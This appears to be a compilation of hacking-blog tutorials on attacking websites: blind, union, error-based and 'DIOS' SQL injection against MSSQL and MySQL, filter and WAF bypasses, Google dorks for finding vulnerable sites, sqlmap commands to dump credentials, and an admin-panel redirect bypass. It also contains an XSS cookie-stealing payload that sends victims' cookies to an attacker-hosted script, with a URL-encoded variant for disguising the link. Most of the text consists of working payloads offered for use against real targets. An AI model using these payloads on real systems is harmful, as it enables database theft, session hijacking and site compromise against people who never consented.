Mssql Blind Sql Injection Tutorial Step By Step !

Mssql Blind Sql Injection Tutorial Step By Step

In this tutorial you will learn how to perform and exploit Blind Mssql SQL Injection manually step by step.So,

What is Blind Mssql SQL Injection ?

Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.

In some case, Using normal sql injection is not work. Blind sql injection is another method which may help you. The important point for blind sql injection is the difference between the valid and invalid query result.You have to inject a statement to make query valid or invalid and observe the response.

How To Test Mssql Blind SQL Injection Vulnerable Sites ?

Lets us assume that  http://www.example.com/page.asp?id=1 is normal url of the website. so lets check the vulnerability of website by using true & false conditions like 1=2, 1=1, or 0>1.

http://www.example.com/page.asp?id=1 and 1=1  (True)
http://www.example.com/page.asp?id=1 and 1=2  (False)
http://www.example.com/page.asp?id=1 and 0>1  (False)

If the results from these requests are different, it will be a good signal for you. That Means the Website is vulnerable to blind mssql Sql injection. When you put “id=1 and 1=1“, It means that the condition is true so, the response must be normal. But the parameter “id=1 and 1=2″ indicates that the condition is false and if the webmaster does not provide a proper filter, the response absolutely differs from previous.

Extracting data through Blind Mssql SQL Injection

By using blind mssql sql injection you can extract database but you have to spend more time on that. You will get only one character of the word by executing the some queries.

Let me explain you an example of querying the first character of database name. We assume that database name is member. Therefore, the first character is “m” which the ascii value is 109. (At this point, we assume that you know ascii code).

Ok, first, we have to know that the results from requests have only 2 forms.

The following steps are up to each person. You idea may be different from our idea in order to pick ascii code to test query.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90

In this situation, the result will be valid query result like http://www.example.com/page.asp?id=1 and 1=1 (because the first character of database name is “m” which ascii code is 109). Then, we try

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>120

It is surely that the result will like http://www.example.com/page.asp?id=1 and 1=2 (because 109 absolutely less than 120).
then, we will try,

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>105

The result is a valid query result and at this point, the ascii value of first character of database name is between 105 and 120.
So, we try

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>112 ===> invalid query result
 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>108 ===> valid query result
 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>110 ===> invalid query result
 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>109 ===> invalid query result

You see that the first character of database name has an ascii value which is greater than 108
but is not greater than 109. Thus, we can conclude that the ascii value is equal to 109.

You can prove with:

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)=109

We sure that the result is like the result of http://www.target.com/page.php?id=1 and 1=1

The rest which you have to do is to manipulate some queries to collect your preferred information.
In this tutorial, we propose some example queries in order to find the names of tables and columns in the database.

Extracting table names through Blind Mssql SQL Injection

In order to get table name, we can use above method to obtain each character of table name.The only thing that we have to do is to change query to retrieve table name of current database. As MSSQL does not have limit command. Therefore, the query is a bit complicated.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) 
 FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
 AS varchar(8000)),1,1)),0)>97

The above query is used to determine the first character of first table in current database. If we want to find second character of first table,we can do by following request:

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55)) AS varchar(8000)),2,1)),0)>97

We change the second parameter of substring function from 1 to 2 in order to specify preferred position of character in table name.
Thus, if we want to determine other positions, we require only changing second parameter of substring function.

In case of other tables, we can find other table names by changing the second select
from “SELECT TOP 1” to be “SELECT TOP 2” , “SELECT TOP 3” and so on. for example,

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 2 LOWER(name) FROM sysObjects WHERE xtYpe=0x55)) AS varchar(8000)),1,1)),0)=97

Extracting column names through Blind Mssql SQL Injection

After we obtain table names, the next target information is absolutely column names.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM syscolumns i HERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),1,1)),0)>97

In order to circumvent from magic quote filtering, you have to change ‘tablename’ to be the form of concatenating char() command. for example, if table name is ‘user’, when we put ‘user’ in the query, ‘ may be filtered and our query will be wrong. The solution is convert ‘user’ to be char(117)+char(115)+char(101)+char(114). So, the query in where cluase changes from “Where name=’user'” to “Where name=char(117)+char(115)+char(101)+char(114)”.

Read more: Union Based Mssql Injection Manually Step by Step
In this case, we can circumvent magic quote filtering. The result from the above request is the first character of the first column name of specific table.
When we want to find the second character of the first column, we can use the same method as getting table name, by changing the second parameter of
substring function.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM 
 syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE 
 id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),2,1)),0)>97

The above request is used to determine the second character of the first column name in specific table.
In case of determining other columns, we can do by changing p.x value from 1 to 2,3,4 and so on. such as,

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM 
 syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE 
 id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=2))AS varchar(8000)),1,1)),0)>97

The first character of the second column name in specific table can be determined by the above request.

 

Cookie Stealing From Cross Site Scripting ( xss ) Attack

Cookie Stealing From Cross Site Scripting (xss ) Attack

Hello Guys, In this post I will show you Cookie Stealing From Cross Site Scripting ( xss ) Attack. How Attacker can steal cookie from users ?. So I hope you are familiar with xss If not then please read our basic xss tutorial.

Pre-requisite :

  • A Cookie Stealer Code : Get It From Here
  • A Free Web Hosting.
  • Basic Knowledge About XSS Attack.

Cookie stealing is the process in which and attacker exploit the xss vulnerability and steal the cookie from the victim who visit the infected link. These cookie will be used to compromise their accounts.

Creating PHP Cookie Stealer

 

  • Copy the cookie stealer code from here.
  • Open the notepad or any editor and paste the code.
  • Save the file with .php extension. Ex:- xss.php

Now create New file and save it as log.txt (leave it as blank). Don’t change the name , this is the file name what we give in php file.
Now we have Two Files : 1) xss.php 
                                      2) log.txt

Hosting Cookie Stealer and Log file

Now we have to host both the files for hosting files you can use free web hosting or you can do secure tunelling. After hosting domain the stealer will be at : www.domain.com/xss.php

Cookie Stealing From Cross Site Scripting ( xss ) Attack

Now, we have set everything now we have to find vulnerable website to exploit to inject our malicious code.

<script>location.href = ‘http://www.site.com/xss.php?cookie=’+document.cookie;</script>

Cookie Stealing with Stored vs Reflected XSS:

Stored: if you inject this code in Persistent XSS vulnerable site, it will be there forever until admin find it.  It will be shown to all users.  So attackers don’t need to send any link to others.  Whoever visit the page, they will be vicim.

Reflected: In case of Non-persistent attack, attacker will send the link to victims. Whenever they follow the link, it will steal the cookie.  Most of sites are vulnerable to Reflected XSS .

In Reflected, Attackers will send the injected link victims.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = ‘http://www.Yoursite.com/Stealer.php?cookie=’+document.cookie;</script>

The above link is clearly shows the script. Attacker can encode this script in url encoding and and make short the link with url shortening service like tiny url and then send to victim.

http://www.Site.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e

Once the victim Open the link, his/her cookie will be stored in log.txt file.

 

MSSQL Union Based Injection Step By Step

MSSQL Union Based Injection Step By Step

Today I am going to show you MSSQL Union Based Injection Step By Step. In this post I will only cover from basics. I don’t see a lot of detailed tutorials on the Internet so I am going to do what I can to help out based on my experience with MS SQL Injections. first of all we need to know the basics of injecting, all the basics including finding the type of injection, database testing and finding the columns etc are same to other databases so i ll suggest you to read the basics before you start here if you don’t read them yet.

so, lets start 😀 ………..

  • So the checking part is same as MySQL first putting single quote and then putting double quote checking the error and i came to know this one is single quote based injection.
www.site.com/?id=1%27 [ Error ]
www.site.com/?id=1%22 [ Error ]

RememberWhen both Single quote and double Quotes gives error then there are high probablities that the injection type is integer based because Single quote based then double quote do not give error and when the injection is double quote based then single quote do not give error, and when both single quote and double quotes give error then apply the golden rule that the injection is integer type.

  • Now lets break and fix the query
    www.site.com/?id=1 -- - [ Working Fine ]
    www.site.com/?id=1 order by 5-- - [ Working Fine ]
    www.site.com/?id=1 order by 6-- - [ Error ]

    That means total number of columns are 5.

  • Now we can continue with order by and in the end we come to know that 5 is the last working column. Now the next part is using using the union select query.
www.site.com/?id=1 and false UnIoN SeLeCt 1,2,3,4,5-- -
MSSQL Union Based Injection Step By Step

If you get this error then in such cases we have an option to use null.

www.site.com/?id=1 and false UnIoN SeLeCt null,null,null,null,null-- -
  • so now we have to use have to convert each column one by one to @@version or db_name() that you will see in video how I did ;).
  • Now when we will put @@version in the column and if the column is vulnerable then it shows version something like this..
    MSSQL Union Based Injection Step By Step

There are some other ways also to collect some more information from MSSQL which are given here:

  1. @@version – Gives version
  2. db_name() – Gives the name of database()
  3. user,system_user,current_user,user_name – Gives the current user.
  4. @@SERVERNAME – Gives the info. about Hostname.
  • Now we will extract the table names, here the syntax is a little bit different than MySQL of lack of limit clause in MSSQL.
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 1 table_name from information_schema.tables order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 2 table_name from information_schema.tables order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 3 table_name from information_schema.tables order by 1) as shit order by 1 desc--
  • In this way Increase the top value. But in video I have shown only diosing site.
  • Now in same manner we can extract the column name. let’s see..
http://site.com/?id=1 and false Union All Select 1,column_name,3,db_name(),5 from (select top 1 column_name from information_schema.columns where table_name='your table name here' order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,column_name,3,db_name(),5 from (select top 2 column_name from information_schema.columns where table_name='your table name here' order by 1) as shit order by 1 desc--
  • Now lets dump the data from tables and columns. here for concatenation we can use %2b which is ‘ + ‘ .
http://site.com/?id=1 and false Union All Select 1,username%2b' '%2bpassword,3,db_name(),5 from from table name here --

Now we have done this almost. Now lets come to diosing part.

This dios have been created by my friends Zen and Rummy. By Diosing the site we can make the whole process faster.

How to Dios the Mssql Site:

Dios

;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='Injected by Ahmed :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Ahmed1 END--

  • Just remove the union select and fix the query then add dios and execute as shown below for more details see video.
http://site.com/?id=1;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='Injected by Ahmed :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Ahmed1 END--
  • It will give error but actually its making the DIOS table so now lets try checking the output under Ahmed1.

MSSQL Union Based Injection Step By Step

  • And here we got compete output at once. Before i finish i ll like to show you some basic errors in MSSQLi.

So here we finish MSSQL Union Based Injection. Keep practicing and learning guys..

Error Based sql Injection Step by Step

Error Based Sql Injection Step by Step

After the union based sql injection I am going to cover error based sql injection. Sometimes during injection sites we got number of columns but on union statement it gives an error The used select statement has different number of columns. and then you start brute forcing columns but brute forcing also not works. So these kinds of websites are injected by Error based or double query injection.

so lets come to work…

  1. First step is to get version here is the error based query to get version.
www.vuln-web.com/?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 -- -

2. Second step is to enumerate the database of website use the above query and replace version() with database(). but there is a another syntax used to enumerate database is:

www.vuln-web.com/?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) -- -

If the website has more than one database the it can be enumerate by changing limits such as
Limit 0,1
Limit 1,1
Limit 2,1

In this way you can get all the database of the website.

3. Third step is to enumerate the table names and the column name of the target

www.vuln-web.com/?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -

using this query you can get a table name. For getting all the table name what you can do is just increase the value of limits as shown above.

4. Fourth step is to enumerate the columns so we got the column users and we have to enumerate the columns of the table user

www.vuln-web.com/?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) -- -

Note : Replace the table_name=0x7573657273 with your desired table name and convert it into hex.

5. Fifth step is to dump data from the column so suppose we get the column name is username and password. so we are going to dump the password column from the table users.

www.vuln-web.com/?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,0x3a,password)+AS+CHAR),0x7e))+FROM+users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) -- -

here we use 0x3a is a hex vale of ‘ : ‘  it s a break between in username and password and it shows result like this
username : password
If we doesn’t use this break we will not understand what’s on the page it give result like this
usernamepassword

Here,
users = table name
Username = Column 1st
password  = Column 2nd

Replace this with your desired table name and column name.

Thanks for the reading guys keep practising and learning 🙂

Bypass illegal mix of collations in sql injection

Bypass illegal mix of collations in sql injection

In this post you will learn how you can bypass the error illegal mix of collations in sql injection.

what is illegal mix of collation ?

Collation refers to a set of rules that determine how data is sorted and compared. Character data is sorted using rules that define the correct character sequence, with options for specifying case-sensitivity, accent marks, character types and character width.

Collation is concerned with how character data is interpreted by SQL Server. Because many people use MySQL with data to be stored in languages other than English, they need to select the rules of comparisons which in turn depends on the character set used for storing that data.

In MySQL, data is stored using a specific character set, which can be defind at different levels; i.e., the sever, the database, the table, and the column levels.

With union select we are combining result-set of two or more select statements. We already know that each SELECT statement within the UNION must have the same number of columns. The columns must also have similar data types. And they must have same collation !! If they are different we get an error.

Bypassing Error

# Method 1

Define COLLATE
SELECT * FROM table ORDER BY somekey COLLATE latin1_general_ci;

We can use different collation names:
latin1_general_ci
utf8_general_ci
utf8_unicode_ci
latin1_german1_ci
latin1_swedish_ci

A name ending in _ci indicates a case-insensitive collation.
A name ending in _cs indicates a case-sensitive collation.
A name ending in _bin indicates a binary collation. Character comparisons are based on character binary code values

# Method 2

By using function CONVERT
CONVERT() provides a way to convert data between different character sets. The syntax is: CONVERT(expr USING transcoding_name).
http://vuln-web.com/?id=1 and 0 UNION SELECT,convert(version() using binary),3,4,5,6,7,8--

# Method 3

Use function CAST

you can also use CAST() to convert a string to a different character set. The syntax is: CAST(character_string AS character_data_type CHARACTER SET charset_name).

http://vuln-web.com/?id=1 and 0 UNION SELECT 1,cast(version()as binary),3,4,5,6,7,8--
Read More: Inject a site when commas are block

# Method 4

Use function UNHEX(HEX(xx))
UNHEX() –> Return a string containing hex representation
HEX() –> Return a hexadecimal representation of a decimal or string value

http://vuln-web.com/?id=1 and 0 UNION SELECT 1,UNHEX(HEX(version())),3,4,5,6,7,8--

Hope, this will help you in illegal mix of collation error. Keep learning and practising.

Thanks for reading guys. 🙂

Sql Injection – Inject A Site When Commas Are Blocked

Inject A Site When Commas Are Blocked

In this tutorial I will show you how to Inject a site when commas are blocked. Injecting a site when commas are blocked is too easy.

There are many methods to bypass commas in sql injection.

# Method 1

By putting , in comment like

union select 1/*!,*/ 2/*!,*/ 3

OR

union select 1/*,*/ 2/*,*/ 3

# Method 2

We can use CHAR(44). CHAR value is the Ascii value of Comma. After regular commas are strip out by WAF those as CHAR may remains.

union select 1,CHAR(44), 2,CHAR(44), 3

# Method 3

We can use command join.

(select 1)a join (select 2)b join (select 3)c

# Method 4

Escaped-encoding/URL encoding (or sometimes referred to as percent-encoding) is a method of representing characters within an URL that may need special syntax handling to be correctly interpreted. This is achieved by encoding the character to be interpreted with a sequence of three characters. It consists of the percentage character % followed by the two hexadecimal digits representing the octet code of the original character. For example, the US-ASCII character set represents a comma with octet code 44, or hexadecimal 2C. Thus its URL-encoded representation is %2C.

union select 1%2C 2%2C 3

# Method 5

we can replace the comma with %82.

union select 1%82 2%82 3

# Method 6

Sometimes this basic URL-encoding attack might not work, however you can circumvent the WAF by double URL-encoding the blocked character(s). In the double-encoded attack the % character in the original command is itself URL-encoded in the normal way (as %25) so that the double-URL-encoded value of comma (%2C) is %252C.

union select 1%252C 2%252C 3

Thanks for reading guys. Now my next tutorial will be on bypassing white spaces. keep sharing and learning 🙂

Bypass The Admin Panel Using No Redirection

Bypass The Admin Panel Using No Redirection

In this post I will show you how you can bypass the admin panel using no redirection. Today almost 60% websites are bypassable using no redirection.

Pre-requisite:

  • Mozilla Firefox
  • No redirect Addon
  • Brain 😉

What an attacker can do ?

  • An attacker can bypass admin panel and access the admin panel using this addon.
  • An attacker can make changes in site.
  • An attacker can shell the site.

so lets come to work..

  • Download and install the no redirection addon. If you don’t have get it from here.
  • Open the admin panel of targeted website.

For example: http://vuln-web.com/admin/index.php

  • Now we will guess the file name in folder to directly request the page if you cannot guess then you can spider a whole site and can perform this.
http://vuln-web.com/admin/index.php        (same Login Page)
http://vuln-web.com/admin/login.php        (Error, Page Not Found)
http://vuln-web.com/admin/home.php         (Error, Page Not Found)
http://vuln-web.com/admin/welcome.php      (Error, Page Not Found)
http://vuln-web.com/admin/dashboard.php    (Error, Page Not Found)
http://vuln-web.com/admin/default.php      (Error, Page Not Found)
http://vuln-web.com/admin/admin.php        (Redirected to index page )
  • The http://vuln-web.com/admin/admin.php redirects to index page that means this is present in the site so now we will directly request this page.
  • For directly request I will block the redirection using no redirect so just open your No redirection Addon by pressing ‘ alt ‘ key.
  • Add the admin panel URL in the addon.
 example: http://vuln-web.com/admin/
  • After adding now request the page admin.php. this time no redirection takes place because we blocked the redirection using no redirect addon.

Done, The only thing you need to do is guessing the files in admin folder. if not found any page spider or crawl the site and request the page.

Thanks for reading guys, keep sharing and practise.

SQL injection Union Based Manually Step by Step

SQL injection Union Based Manually Step by Step

Hello guys hope you were doing good in this tutorial we will discuss about basic SQL injection union based manually so first i would like to recommended you to learn the basic of SQL from w3schools. so lets me start from introduction.

What is SQL Injection ?

SQL Injection is a type of code injection vulnerability in database layer. A successfull sql injection exploit can read and modify the backend database. This vulnerability can be found when user input is incorrectly filtered for string.

What an attacker can do ?

  • An attacker can Inject in website and can read and modify database.
  • An attacker can take the control of your admin panel if you have.
  • If the targeted website is E-commerce and website store the information then attacker can easily get.
  • An attacker can shell and deface the website.

So lets start our work….

Step 1:

Find an SQL Injection vulnerable website with google dorks. Huge list of SQLI dorks click Here

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:shop.php?id=

Step 2:

Now you will have to check the vulnerability by adding single quote after id parameter and hit enter if you will get a error message like sql syntax error that means site is vulnerable to sql attack.

www.vulnerablesite.com/index.php?id=1'

Step 3:

Now after checking the vulnerability if the site is vulnerable then you will have to find the number of columns by using order by statement.

www.vulnerablesite.com/index.php?id=1' order by 1 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 2 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 3 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 4 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 5 --+ [error]

Here i got the error message in order by 5 that means the total number columns are 5.

Step:4

Now we will the vulnerable column using union command

www.vulnerablesite.com/index.php?id=1' union select 1,2,3,4 -- +

SQL injection manually

As you can see in the above image vulnerable column is 2 following things we will use this commands.

Version - @@version also version()
Database- database()
Current User - user()

Step 5 :

Now we will find the table name just paste this query in vulnerable column given below.

(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE())

SQL injection Union Based ManuallyStep 6:

we will find the column names of particular table just use this query.

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name= [table name in hex]

yeah now we got column name of table name and our next target is to dump data.

Step 7:

Now we got database,table name and column name as well so we will dump database of the targeted website. just replace column_name with the target column for example. admin, user e.t.c and add in last from targeted table.

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(username,0x3a,password),3,4 from admin--+

yeah we got the username and password.

keep practising but don’t harm any site…

 

How to find sql vulnerable website easily

How to find sql vulnerable website easily

Hello guys in this post I will show you how you can find a lots sql vulnerable website in by single dork using automated tool but I recommended you to find manually. Many of the newbie don’t get vulnerable site easily to inject so in this tutorial they can be able to  find  sql vulnerable website easily.

So in this tutorial we will use SQL DB if you don’t have SQL DB then you can download it from google.

  • Launch SQL DB and in the left position you will see search option.

sql vulnerable site

  • just enter your dork. here the best feature of this tool is it has the option of search engine by which search engine you wanna use and the another one is Deep scan and proxy.
  • when you start search using your dork then it will start scanning.
  • now scanning started here you can see many of the multiple tab such as proxy, vulnerable e.t.c
  • just click on that vulnerable and it show you the list of sql vulnerable website

SQL injection through SQLMAP step by step

SQL Injection through SQLMAP

Hello Guy, Today I gonna show you a major vulnerability in web applications. There are many types of injection and in this a SQL Injection Comes also. SQL Injection is very vast keep learning even though I am also still learner so without wasting any time lets come to point.

SQL Injection

SQL Injection is a type of vulnerability in which an attacker can execute can some code and expose backend database or in simple words an attacker can dump your database.

SQL Map

SQL map is a command line interface tool use for exploiting SQL injection vulnerabilities it is a open source tool .

If you are using windows you can download SQL Map Here , However Kali has inbuilt SQLMAP

Lets start practicle…….

  • Launch SQLMAP

Now type Following command in terminal

  • python sqlmap.py -u http://yourtargetaddress.com/?id=1 –current-db

Sql injections attack

  • Now our SQL map started. It will take some couple of seconds to enumerate database
  • now we got the database as you can see the above image. our next step is to enumerate tables
  • Type the following command to enumerate tables follow me step by step. 🙂

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name –table

sql injection by sqlmap

as you can see in the below image we had successfully enumerate table names.

sql injections vulnerability

In the above Image you can see that sqlmap enumerated table name no we will have to find column. here i am finding columns fo admin.

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name -T table name –columns

again sqlmap is enumerating column name from the table admin.

Sql injections tutorial

Cool guys we had successfully enumerate the column name now our next step is to dump/enumerate the Username and password.

Follow me and use this command

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name -T table name -C column name –dump

sql injections

sql map started a enumerating database as you can see database enumerated.

Sql Injection

yeah, we got username and password.. 🙂 keep learning and practising but don’t harm any site…